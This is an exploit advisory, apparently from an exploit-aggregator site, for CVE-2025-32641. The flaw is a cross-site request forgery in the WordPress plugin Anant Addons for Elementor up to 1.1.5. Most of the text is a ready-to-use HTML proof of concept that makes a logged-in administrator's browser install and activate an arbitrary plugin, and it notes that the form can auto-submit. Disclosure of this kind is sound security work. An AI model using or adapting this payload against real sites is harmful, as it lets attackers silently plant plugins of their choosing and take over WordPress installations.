Share 
## https://sploitus.com/exploit?id=PACKETSTORM:190435
# ๐Ÿ›ก๏ธ Anant Addons for Elementor <= 1.1.5 - CSRF to Arbitrary Plugin Installation
    
    ## ๐Ÿงจ CVE-2025-32641
    **Cross-Site Request Forgery (CSRF)** vulnerability in **anantaddons**' Anant Addons for Elementor  
    This issue affects versions: **from unknown through 1.1.5**
    
    - **Base Score**: 9.6 (CRITICAL)
    - **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`
    
    ---
    
    ## ๐Ÿ” Description
    
    This vulnerability allows **unauthenticated attackers** to perform **arbitrary plugin installation** on behalf of a logged-in administrator without their knowledge.  
    By crafting a malicious page or form, the attacker can silently force the admin to install and activate any plugin from the WordPress repository.
    
    ---
    
    ## ๐Ÿ’ฅ Impact
    
    - โœ… Arbitrary plugin installation  
    - โœ… Plugin activation  
    - โŒ No nonce or CSRF protection  
    - โœ… Exploitable via a simple HTML page  
    - โš ๏ธ Requires admin to be logged in and open the malicious page  
    
    ---
    
    ## ๐Ÿงช HTML Proof of Concept
    
    ```html
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
      <style>
        body {
          background-color: #111;
          color: #0f0;
          font-family: monospace;
          padding: 40px;
        }
        h1 {
          color: #ff0055;
          font-size: 24px;
          border-bottom: 1px solid #555;
          padding-bottom: 10px;
        }
        .box {
          background-color: #222;
          border: 1px solid #444;
          padding: 20px;
          margin-top: 20px;
        }
        input[type="submit"] {
          background-color: #ff0055;
          color: #fff;
          border: none;
          padding: 10px 20px;
          font-weight: bold;
          cursor: pointer;
        }
        input[type="submit"]:hover {
          background-color: #cc0044;
        }
      </style>
    </head>
    <body>
    
      <h1>
        Anant Addons for Elementor <= 1.1.5<br>
        CSRF to Arbitrary Plugin Installation Vulnerability
      </h1>
    
      <div class="box">
        <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
        <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
        <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
      </div>
    
      <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
        <input type="hidden" name="plugs" value="hello-dolly">
        <p>๐ŸŽฏ Click the button below to trigger plugin installation (admin session must be active):</p>
        <input type="submit" value="Exploit Now">
      </form>
    
    </body>
    </html>
    
    
    ```
    
    > ๐ŸŽฏ When a logged-in administrator clicks this form (or it auto-submits in a malicious page), the plugin will be silently installed and activated.
    
    ---
    
    ## โš ๏ธ Disclaimer
    
    This repository and content are for **educational and security research purposes only**.  
    The author is **not responsible** for any misuse or damage caused by improper use of this information.  
    Always perform testing on systems **you own or have explicit permission to test**.
    
    ---
    
    *by: Nxploited | Khaled ALenazi*